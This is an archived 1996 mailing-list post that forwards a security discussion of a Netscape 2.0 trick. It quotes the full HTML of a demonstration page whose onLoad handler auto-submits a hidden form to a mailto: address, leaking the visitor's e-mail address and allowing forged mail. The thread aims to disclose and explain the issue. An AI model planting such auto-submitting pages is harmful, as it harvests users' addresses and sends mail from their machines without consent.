JavaScript to grab e-mail <explained> (fwd)

[Alan Olsen <alano@teleport.com>]

This is something that i had not seen posted here as of yet.  (Sorry if it
has.  My mail feed has been suffering from altzheimers as of late and
getting progressivly worse...)

Crypto Relevance:  None
Privacy Relevance: Lots

This was forwarded to me by the "CGI Guy" at Teleport.  I had heard this was
possible.  I was quite surprised to find just how *easy* this is!  I can see
a number of creative (and scary) uses for this little hack.  (This makes
JavaScript seem more like a coffee enema.)

--------- Forwarded message ---------------

>Well, here it is...  I've been yelling about Netscape's use of the 
>action="maito:user@place.com" for a long time.  By clicking on a submit 
>button (with any name) you can grab the user's email address, sig file 
>and other prefs.  
>
>JavaScript in Netscape 2.0 removes the necessary "click."  I'm sending 
>visitors to my site a notification of this problem.
>
>Robert Muhlestein
>Teleport Creative Services
>CGI Guy
>cgi@teleport.com
>
>---------- Forwarded message ----------
>Date: Mon, 26 Feb 1996 16:52:30 +0100
>From: Lincoln Stein <lstein@kaa.crbm.cnrs-mop.fr>
>To: www-managers@lists.stanford.edu, www-security@ns2.rutgers.edu
>Cc: lstein@pico.crbm.cnrs-mop.fr
>Subject: Re: JavaScript to grab e-mail <explained>
>
>I just had a look at the e-mail scamming script (URL
>http://www.popco.com/grabtest.html).  It's quite simple.  Here's the
>complete text:
>
><HTML>
><HEAD>
></HEAD>
><BODY onLoad="document.mailme.submit()">
>
><form method=post name="mailme"
>      action="mailto:reply@simenon.popco.com?subject=scammed address">
>
><h3>Viewing this page automatically submits email to an 
>address which then sends you back email to prove it grabbed the message.</h3>
>
><input type=hidden name="scammed.the.address" value="did it">
></form>
>
></BODY>
></HTML>
>
>Basically what the script does is to make the browser submit e-mail to
>the indicated mailto: URL.  When the mail is sent, the user's reply
>address is included as a matter of course.
>
>The good news is that this does _not_ represent a general security
>hole in JavaScript itself.  I was concerned that someone had
>discovered a way to make JavaScript divulge such browser secrets as
>the contents of the disk cache, history list, or newsgroup
>subscriptions.  
>
>The bad news is that this technique can be used as a general Internet
>e-mail forgery system.  Anybody accessing a particular page will
>unwittingly mail out an e-mail message, whose recipient, subject and
>message body are all under the control of the JavaScript author.  If
>the message is traced back, it will be found to have originated from
>the user's machine.
>
>Lincoln
>
>
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.